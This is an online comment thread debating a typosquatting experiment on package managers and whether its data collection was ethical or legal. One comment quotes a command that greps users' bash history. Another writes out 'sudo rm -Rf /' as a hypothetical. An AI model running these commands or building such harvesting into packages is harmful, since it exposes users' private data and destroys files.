It’s not clear if the experiment broke ethical or even legal boundaries, since it relied on confusion if not outright deceit to trick people into installing something other than what they intended to install. Still, the lesson the experiment imparts is worth heeding.

I’m not sure I understand what the “ethical or even legal boundaries” they are implying were broken here. It doesn’t go into detail about what the script he wrote does, if it was something malicious that would make more sense. But if i read it correctly he basically wrote a script that shows a warning message telling the developer their mistake and pings home to register the download in order to see how large the attack vector was. Am I missing something or is the article trying to make things sound way more interesting than they really were?

I think the article is just being bombastic. I don’t see anything unethical about it, it’s basically how all computer security research works.

That being said, judging from the recent CFAA cases, it probably would be considered illegal by US law. It’s a good thing the student lives in Germany and not the US, or they might be looking at jail time (especially since the package infected .mil domains).

I would argue that the specifics of what he did were both unethical and illegal. Illegal by the letter of the Computer Fraud and Abuse Act, as you mentioned (he certainly exceeded authorized access on the machines that downloaded his fraudulent packages, as the users no doubt had no expectation that downloading the packages would result in searching of their machine or transmission of data to some outside location). Unethical because his packages scanned the user’s machines, including command history, resulting in potential accidental disclosure of private information. I understand that he had some personal justification for this in the context of his research, but without permission (which would likely have had to have been given by the users when they first accessed the package manager, likely with some sort of credential system to track their having opted in to experiments that may expose personal information), this definitely seems like a breach of reasonable ethical practices in the security field.

It’s on page 23 of the thesis for which this work was done. Here’s the quote listing what the fraudulent packages collected and transmitted back to the university machine. Note that all data was transmitted unencrypted over HTTP as the query string of a GET request.

The typosquatted package name and the (assumed) correct name of the package. This information was hard-coded in the notification program before the package was distributed. Example: coffe-script and coffee-script (correct name).

The package manager name and version that triggered the operation. The package manager name was also hard-coded, before the package was uploaded. The package manager version was retrieved dynamically. Example: pip and the outputs of the command pip –version

The operating system and architecture of the host. Example: Linux-3.14.48

Boolean flag, that indicates whether the code was run with administrative rights. Getting this information on Windows systems is not trivial and possibly error prone.

The past command history of the current user that contains the package manager name as a substring. This information could only be retrieved from unixoid systems, because Windows systems do not store shell command history data. Example: Output of the shell command grep “pip[23]? install” ~/.bash_history

A list of installed packages that were installed with the package manager.

Hardware information of the host. Example: Outputs of lspci for linux. On OS X, the outputs of system_profiler -detailLevel mini were taken.

I suppose I should have been more precise. The type of data collection the program did, in particular greping for commands in the bash history of any Linux machine for commands containing the name of the package manager, and then transmitting the result of that search back to a remote machine is probably behavior the average user would not expect.

A Ruby gem that computes and installs dependencies is not even remotely the same thing as what happened here.

I absolutely do not expect installing a package or gem will scrape arbitrary information from my system and send it to an unknown third party, and I don’t think many people do expect that or think it’s okay.

Seems a little risky to run arbitrary commands on people’s dev machines.

Imagine somebody had replaced a command he used with a script like “sudo rm -Rf /” ? Sure it’s very unlikely, but there’s no reason they couldn’t do it, and suddenly his research project is guilty of destroying data.

That doesn’t really make any sense. You could make the same argument that a Rubygem which calls File.read would be guilty of destroying data if a user had monkeypatched their Ruby standard library to delete files. Why should shell commands be treated differently from API calls?

That said, the part where he scanned the user’s shell history definitely crossed the line.